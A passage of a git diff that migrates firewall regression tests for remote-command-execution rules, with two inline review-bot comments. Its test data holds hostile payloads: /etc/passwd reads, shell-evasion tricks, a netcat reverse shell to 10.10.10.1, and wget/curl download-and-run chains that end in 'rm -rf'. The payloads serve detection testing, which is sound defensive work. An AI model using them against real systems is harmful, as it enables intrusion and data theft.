encoding="UTF-8"?><note><pdf>if+foo==</pdf></note> output: - no_log_contains: id "932140" + log: + no_expect_ids: [932140] 
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml index 993e9b989..fa787f6fa 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932160.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?932160-1=cat%20/etc/passwd" version: "HTTP/1.1" output: - log_contains: "id \"932160\"" + log: + expect_ids: [932160] - test_id: 2 stages: - input: @@ -32,7 +33,8 @@ tests: data: "932160-2=/usr/bin/perl -e 'print readline' some-file.txt" version: "HTTP/1.1" output: - log_contains: "id \"932160\"" + log: + expect_ids: [932160] - test_id: 3 stages: - input: @@ -47,7 +49,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932160\"" + log: + expect_ids: [932160] - test_id: 4 stages: - input: @@ -62,7 +65,8 @@ tests: data: '932160-2=dont match commands that are not fully qualified like bash python and perl.' version: "HTTP/1.1" output: - no_log_contains: "id \"932160\"" + log: + no_expect_ids: [932160] - test_id: 5 desc: "Positive test: Match against bin/gunzip" stages: @@ -78,7 +82,8 @@ tests: data: 'cmd=/bin/gunzip -c /var/log/something_sensitive.gz' version: "HTTP/1.1" output: - log_contains: "id \"932160\"" + log: + expect_ids: [932160] - test_id: 6 desc: "Positive test: Match against bin/unxz" stages: @@ -94,7 +99,8 @@ tests: data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz' version: "HTTP/1.1" output: - log_contains: "id \"932160\"" + log: + expect_ids: [932160] - test_id: 7 desc: "Negative test: Don't match against the word zip" stages: @@ -110,7 +116,8 @@ tests: data: 'sentence=The zip on my coat is stuck' version: "HTTP/1.1" output: - no_log_contains: "id \"932160\"" + log: + no_expect_ids: [932160] - test_id: 8 desc: "Positive test: Triggering only this rule and no other one" stages: 
@@ -126,7 +133,8 @@ tests: data: 'cmd=/bin/ab' version: "HTTP/1.1" output: - log_contains: "id \"932160\"" + log: + expect_ids: [932160] - test_id: 9 desc: "Positive test: Unix Command Injection - $SHELL test" stages: @@ -142,7 +150,8 @@ tests: uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22" version: HTTP/1.0 output: - log_contains: id "932160" + log: + expect_ids: [932160] - test_id: 10 desc: "Positive test: Unix Command Injection - ${SHELL} test" stages: @@ -158,7 +167,8 @@ tests: uri: "/get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22" version: HTTP/1.0 output: - log_contains: id "932160" + log: + expect_ids: [932160] - test_id: 11 desc: "Positive test: Match against bin/ansible" stages: @@ -173,7 +183,8 @@ tests: uri: "/get?a=bin/ansible" version: HTTP/1.0 output: - log_contains: id "932160" + log: + expect_ids: [932160] - test_id: 12 desc: "Positive test: Match against bin/chef" stages: @@ -188,7 +199,8 @@ tests: uri: "/get?a=bin/chef" version: HTTP/1.0 output: - log_contains: id "932160" + log: + expect_ids: [932160] - test_id: 13 desc: "Positive test: Match against bin/cscli" stages: @@ -203,7 +215,8 @@ tests: uri: "/get?a=bin/cscli" version: HTTP/1.0 output: - log_contains: id "932160" + log: + expect_ids: [932160] - test_id: 14 desc: "Positive test: Match against bin/visudo" stages: @@ -218,4 +231,5 @@ tests: uri: "/get?a=bin/visudo" version: HTTP/1.0 output: - log_contains: id "932160" + log: + expect_ids: [932160] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml index 0667f10fb..1eff8d79d 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml @@ -15,7 +15,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 2 stages: - input: 
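Review bot: `expect_ids: [932160]` in 932160 test 8 only asserts that 932160 fired, while the test's `desc` in the preceding hunk promises "Triggering only this rule and no other one"; a second rule matching `cmd=/bin/ab` would not fail the test. If the runner accepts both keys under one `log:` block, add `no_expect_ids:` listing the sibling 932xxx rules that must stay silent for this payload, otherwise narrow the `desc` to what is actually checked. Every positive test in this patch uses the same `expect_ids`-only form, so the gap is specific to tests whose description claims exclusivity.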
@@ -29,7 +30,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 3 stages: - input: @@ -43,7 +45,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 4 stages: - input: @@ -57,7 +60,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 5 stages: - input: @@ -71,7 +75,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 6 stages: - input: @@ -85,7 +90,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 7 stages: - input: @@ -100,7 +106,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 8 stages: - input: @@ -115,7 +122,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 9 stages: - input: @@ -130,7 +138,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 10 stages: - input: @@ -145,7 +154,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 11 stages: - input: @@ -160,7 +170,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] - test_id: 12 stages: - input: @@ -175,4 +186,5 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932161\"" + log: + expect_ids: [932161] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml index 6e8179bd9..837b9b15c 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml 
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml @@ -20,4 +20,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932170" + log: + expect_ids: [932170] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml index 9fefdbbb8..4f1721ed8 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml @@ -19,7 +19,8 @@ tests: uri: "/get?%28%29%20%7B" version: HTTP/1.0 output: - log_contains: id "932171" + log: + expect_ids: [932171] - test_id: 2 desc: "Test for '() {' in ARGS" stages: @@ -35,4 +36,5 @@ tests: uri: "/get?arg=%28%29%20%7B" version: HTTP/1.0 output: - log_contains: id "932171" + log: + expect_ids: [932171] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml index b8e7354c2..44ab3f124 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?rce=alias%20eennvv%3Denv%26eennvv%20whoami" version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 2 desc: "Test for alias with shell tricks" stages: @@ -35,7 +36,8 @@ tests: rce=alias a=c${KK}url&a google.com version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 3 desc: "Test for alias name with single quoting" stages: @@ -52,7 +54,8 @@ tests: rce=alias 'letter'=curl&letter google.com version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 4 desc: "Test for alias name with double quotes" stages: 
@@ -69,7 +72,8 @@ tests: rce=alias "quote"=curl"e google.com version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 5 desc: "Test for alias value with single quoting" stages: @@ -86,7 +90,8 @@ tests: rce=alias alias='curl'&letter google.com version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 6 desc: "Test for alias value with double quotes" stages: @@ -103,7 +108,8 @@ tests: rce=alias double="curl""e google.com version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 7 desc: "Negative test alias" stages: @@ -120,7 +126,8 @@ tests: "text=I%20see%2C%20so%20your%20alias%20is%20not%20%3D%20to%20your%20name" version: HTTP/1.1 output: - no_log_contains: id "932175" + log: + no_expect_ids: [932175] - test_id: 8 desc: "Negative test alias with quotes" stages: @@ -137,7 +144,8 @@ tests: "text=The%20pizza%20vendor%20was%20known%20by%20the%20alias%20%22pineapple%22%20online." version: HTTP/1.1 output: - no_log_contains: id "932175" + log: + no_expect_ids: [932175] - test_id: 9 desc: "Status Page Test - Test for simple alias example" stages: @@ -152,7 +160,8 @@ tests: uri: "/get?rce=alias%20a=b" version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 10 desc: "Test for alias with -p argument" stages: @@ -169,7 +178,8 @@ tests: rce=alias -p jzfrx=id version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 11 desc: "Test for alias with zsh flags" stages: @@ -186,7 +196,8 @@ tests: rce=alias -gmr a=b version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 12 desc: | Test for alias with zsh '+' flags. @@ -203,7 +214,8 @@ tests: uri: "/get?rce=%61%6c%69%61%73%20%2b%6d%20%61%3d%62" version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 13 desc: | Test for alias with trailing '+' in a flag. 
@@ -220,7 +232,8 @@ tests: uri: "/get?rce=%61%6c%69%61%73%20%2b%67%2b%20%61%3d%62" version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 14 desc: "Test for alias with zsh flags" stages: @@ -237,7 +250,8 @@ tests: rce=alias ls-al='ls -al' version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] - test_id: 15 desc: "Test for alias with zsh flags" stages: @@ -254,4 +268,5 @@ tests: rce=alias ..='cd ..' version: HTTP/1.1 output: - log_contains: id "932175" + log: + expect_ids: [932175] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml index 856f3ea8d..fa512935b 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml @@ -20,7 +20,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932180" + log: + expect_ids: [932180] - test_id: 2 desc: "Test file upload with multipart/form-data and filename config.yml" stages: @@ -49,7 +50,8 @@ tests: BINARYDATA ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- output: - log_contains: id "932180" + log: + expect_ids: [932180] - test_id: 3 desc: "File upload - negative test" stages: @@ -76,4 +78,5 @@ tests: BINARYDATA --0000-- output: - no_log_contains: id "932180" + log: + no_expect_ids: [932180] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml index 0ad487b6d..2e2b5ae9b 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml @@ -19,7 +19,8 @@ tests: uri: "/get?id=cat%2B%2Fet*%2F*wd" version: HTTP/1.0 output: - log_contains: id "932190" + log: + expect_ids: [932190] - test_id: 2 desc: "Match wild card evasion in 'cat+/ET*/*WD'" stages: 
@@ -35,7 +36,8 @@ tests: uri: "/get?id=cat%2B%2FET*%2F*WD" version: HTTP/1.0 output: - log_contains: id "932190" + log: + expect_ids: [932190] - test_id: 3 desc: "Match wild card evasion in '/???/?s'" stages: @@ -51,7 +53,8 @@ tests: uri: "/get?id=%2F%3F%3F%3F%2F%3Fs" version: HTTP/1.0 output: - log_contains: id "932190" + log: + expect_ids: [932190] - test_id: 4 desc: "No FP in 'Does the * shine bright?'" stages: @@ -67,7 +70,8 @@ tests: uri: "/get?id=Does%20the%20%2A%20shine%20bright%3F" version: HTTP/1.0 output: - no_log_contains: id "932190" + log: + no_expect_ids: [932190] - test_id: 5 desc: "Handle single quote evasion mixed with wild card evasion" stages: @@ -85,7 +89,8 @@ tests: version: HTTP/1.0 data: "{\"foo\" : \";+cat+/e't'*/pa'?s'wd\"}" output: - log_contains: id "932190" + log: + expect_ids: [932190] - test_id: 6 desc: "Handle backslash evasion mixed with wild card evasion" stages: @@ -103,4 +108,5 @@ tests: version: HTTP/1.0 data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" output: - log_contains: id "932190" + log: + expect_ids: [932190] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml index 78c7f5ec9..f678da553 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 2 desc: uninitialized variable stages: @@ -33,7 +34,8 @@ tests: uri: "/get?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 3 desc: bash function stages: 
@@ -48,7 +50,8 @@ tests: uri: "/get?host=www.google.com;cat+/etc/%24%28echo%29passwd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 4 desc: uninitialized vars stages: @@ -63,7 +66,8 @@ tests: uri: "/get?host=www.google.com;c%24%40at%2B%2Fet%24%40c%2Fpas%24%40swd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 5 desc: uninitialized vars stages: @@ -78,7 +82,8 @@ tests: uri: "/get?host=www.google.com;c%24%21at%2B%2Fet%24%21c%2Fpas%24%21swd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 6 desc: uninitialized vars stages: @@ -93,7 +98,8 @@ tests: uri: "/get?host=www.google.com;c%24%2Aat%2B%2Fet%24%2Ac%2Fpas%24%2Aswd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 7 desc: uninitialized vars stages: @@ -108,7 +114,8 @@ tests: uri: "/get?host=www.google.com;c%24%3Fat%2B%2Fet%24%3Fc%2Fpas%24%3Fswd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 8 desc: uninitialized vars stages: @@ -123,7 +130,8 @@ tests: uri: "/get?host=www.google.com;c%24-at%2B%2Fet%24-c%2Fpas%24-swd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 9 desc: uninitialized vars stages: @@ -138,7 +146,8 @@ tests: uri: "/get?host=www.google.com;c%24_at%2B%2Fet%24_c%2Fpas%24_swd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 10 desc: uninitialized vars stages: @@ -153,7 +162,8 @@ tests: uri: "/get?host=www.google.com;c%24%24at%2B%2Fet%24%24c%2Fpas%24%24swd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 11 desc: "Test first backslash match ([*?`\\'][^/\n]+/) with: c\at /etc/passwd" stages: 
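Review bot: The `desc` strings of 932200 tests 11 and 12 (`... with: c\at /etc/passwd` at the end of this hunk, `... p\asswd` at the end of the next) are double-quoted, so YAML turns `\a` into a BEL control character and the `\n` inside `[^/\n]+` into a real newline before the runner sees the text; the description no longer shows the backslash evasion it is meant to document. Single quotes keep the text literal: `desc: 'Test first backslash match ([*?`\''][^/\n]+/) with: c\at /etc/passwd'`. The 932210 hunks further down have the mirror-image problem — their `desc` values use `\n` in double quotes while the matching `uri` uses `\\n`, so description and request no longer say the same thing.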
@@ -168,7 +178,8 @@ tests: uri: "/get?host=www.google.com;c%5Cat%20%2Fetc%2Fpasswd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 12 desc: "Test second backslash match (/[^/]+?[*?`\\']) with: cat /etc/p\asswd" stages: @@ -183,7 +194,8 @@ tests: uri: "/get?host=www.google.com;cat%20%2Fetc%2Fp%5Casswd" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 13 desc: "Test correct logging" stages: @@ -214,7 +226,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 15 desc: "Add test to match BB EBIDJ91T" stages: @@ -230,7 +243,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] - test_id: 16 desc: "Add test to match BB MKXQCJMX" stages: @@ -246,4 +260,5 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932200" + log: + expect_ids: [932200] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml index 4873cd347..1fd9e4408 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml @@ -19,7 +19,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932205" + log: + expect_ids: [932205] - test_id: 2 desc: Referer header with query string and obvious payload stages: @@ -35,7 +36,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932205" + log: + expect_ids: [932205] - test_id: 3 desc: Referer header with canonical path, query string and obvious payload stages: @@ -51,7 +53,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932205" + log: + expect_ids: [932205] - test_id: 4 desc: False positive test against query string and space in a parameter stages: 
@@ -67,7 +70,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932205" + log: + no_expect_ids: [932205] - test_id: 5 desc: False positive test against query string and space in path stages: @@ -83,7 +87,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932205" + log: + no_expect_ids: [932205] - test_id: 6 desc: False positive test against syntax highlighter (generic) stages: @@ -99,7 +104,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932205" + log: + no_expect_ids: [932205] - test_id: 7 desc: False positive test against fragment (scroll to text fragment) stages: @@ -115,4 +121,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932205" + log: + no_expect_ids: [932205] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml index dfbd11e85..3cfb335e8 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml @@ -19,7 +19,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932206" + log: + expect_ids: [932206] - test_id: 2 desc: False positive test against URL stages: @@ -35,7 +36,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932206" + log: + no_expect_ids: [932206] - test_id: 3 desc: False positive test against query string and space in path stages: @@ -51,4 +53,5 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932206" + log: + no_expect_ids: [932206] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml index 568668e67..ff3a3d8b1 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml 
@@ -18,7 +18,8 @@ tests: uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" version: HTTP/1.0 output: - log_contains: id "932210" + log: + expect_ids: [932210] - test_id: 2 desc: "%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: @@ -33,7 +34,8 @@ tests: uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" version: HTTP/1.0 output: - log_contains: id "932210" + log: + expect_ids: [932210] - test_id: 3 desc: ";\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: @@ -48,7 +50,8 @@ tests: uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n" version: HTTP/1.0 output: - log_contains: id "932210" + log: + expect_ids: [932210] - test_id: 4 desc: ";\n.databases" stages: @@ -63,7 +66,8 @@ tests: uri: "/get?foo=;\\n.databases" version: HTTP/1.0 output: - log_contains: id "932210" + log: + expect_ids: [932210] - test_id: 5 desc: "Fix N9FKP2XQ: .sh whoami" stages: @@ -78,7 +82,8 @@ tests: uri: "/get/juiceshop?s=1;.sh+whoami" version: HTTP/1.0 output: - log_contains: id "932210" + log: + expect_ids: [932210] - test_id: 6 desc: "N9FKP2XQ" stages: @@ -95,7 +100,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "932210" + log: + expect_ids: [932210] - test_id: 7 desc: "N9FKP2XQ" stages: @@ -112,4 +118,5 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "932210" + log: + expect_ids: [932210] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml index 22fea813a..f5e8edbcf 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml @@ -19,7 +19,8 @@ tests: data: "TEST=echo | php7.4" version: HTTP/1.0 output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 2 desc: "TEST=echo | ${php7.4}php7.4" stages: 
@@ -35,7 +36,8 @@ tests: data: "TEST=echo | ${php7.4}php7.4" version: HTTP/1.0 output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 3 desc: "whxami|sh+``" stages: @@ -51,7 +53,8 @@ tests: data: "whxami|sh+``" version: HTTP/1.0 output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 4 desc: "whxami|fish+``" stages: @@ -67,7 +70,8 @@ tests: data: "whxami|fish+``" version: HTTP/1.0 output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 5 desc: "Negative test" stages: @@ -83,7 +87,8 @@ tests: data: "echo | curx" version: HTTP/1.0 output: - no_log_contains: id "932220" + log: + no_expect_ids: [932220] - test_id: 6 desc: | Test for BB finding 9P5LL13Y @@ -102,7 +107,8 @@ tests: echo "foo;whxam"i | tr x o | sh #" version: HTTP/1.1 output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 7 desc: "Block evasion using here string" stages: @@ -119,7 +125,8 @@ tests: data: | code=cat<<<ifconfig | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 8 desc: "Block evasion using here string with space" stages: @@ -136,7 +143,8 @@ tests: data: | code=cat<<< ifconfig | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 9 desc: "Block evasion using here string with single quotes" stages: @@ -153,7 +161,8 @@ tests: data: | code=cat<<<'ifconfig' | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 10 desc: "Block evasion using here string with double quotes" stages: @@ -170,7 +179,8 @@ tests: data: | code=cat<<<"ifconfig" | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 11 desc: "Block evasion using here string with command substitution" stages: @@ -187,7 +197,8 @@ tests: data: | code=cat<<<$(whoami | sh) output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 12 desc: "Block `time` prefix" stages: 
@@ -204,7 +215,8 @@ tests: data: | code=time whoami | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 13 desc: "Block `strace` prefix" stages: @@ -221,7 +233,8 @@ tests: data: | code=strace whoami | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] - test_id: 14 desc: "Block `nohup` prefix" stages: @@ -238,4 +251,5 @@ tests: data: | code=nohup whoami | sh output: - log_contains: id "932220" + log: + expect_ids: [932220] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml index 843002bf6..47814322e 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml @@ -23,7 +23,8 @@ tests: uri: "/get?foo=system('echo%20cd%20/tmp;wget%20http://turbatu.altervista.org/apache_32.png%20-O%20p2.txt;curl%20-O%20http://turbatu.altervista.org/apache_32.png;%20mv%20apache_32.png%20p.txt;lyxn%20-DUMP%20http://turbatu.altervista.org/apache_32.png%20>p3.txt;perl%20p.txt;%20perl%20p2.txt;perl%20p3.txt;rm%20-rf" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 2 desc: System Command Injection (932230) from old modsec regressions stages: 
@@ -42,7 +43,8 @@ tests: uri: "/get?foo=http://ricky.ilmerlodellarocca.com/upload.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/appa.jpg;%20appa.jpg;perl%20appa.jpg;rm%20-rf%20appa.jpg;wget%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;curl%20-O%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;lwp-download%20http://shinnongclinic.com/kor_board/icon/member_image_box/1/ca.txt%20ca.php;mv%20ca.php%20ca.php;chmod%20755%20ca.php" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 3 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: @@ -61,7 +63,8 @@ tests: data: "arg=Something+true+positive+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 4 desc: Like 932230-3 but instead of space sign using new line sign stages: @@ -80,7 +83,8 @@ tests: data: "arg=Something+%26%238222%3BThe+Title%26%238221%3B.%0D%0AThis+is+the+new+line.+After+it+more+characters%0D%0AAnd+the+3rd+line+goes+here" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 5 desc: Another html entity - decimal 9977 (person with ball) with space sign after entity and dot stages: 
@@ -99,7 +103,8 @@ tests: data: "arg=Another+entity+and+the+dot+after+it+and+space+%26%239977%3B.+and+more." version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 6 desc: Another html entity - decimal 128 (euro) with new line sign after entity and dot stages: @@ -118,7 +123,8 @@ tests: data: "arg=Euro+entity+%26%238364%3B.%0D%0Aand+the+new+line+after+entity+and+dot" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 7 desc: arg value of ";ifconfig Something „The Title”. After space or new line more characters" is blocked stages: @@ -137,7 +143,8 @@ tests: data: "arg=;top+Something+else+1+%26%238222%3BThe+Title%26%238221%3B.+After+space+or+new+line+more+characters" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 8 desc: arg value of "Something „The Title”. After ;ifconfig something" is blocked stages: @@ -156,7 +163,8 @@ tests: data: "arg=Something+else+2+%26%238222%3BThe+Title%26%238221%3B.+After+%3Btop+something" version: HTTP/1.1 output: - no_log_contains: id "932230" + log: + no_expect_ids: [932230] - test_id: 9 desc: Positive test - RCE passed in one of the args stages: @@ -176,7 +184,8 @@ tests: 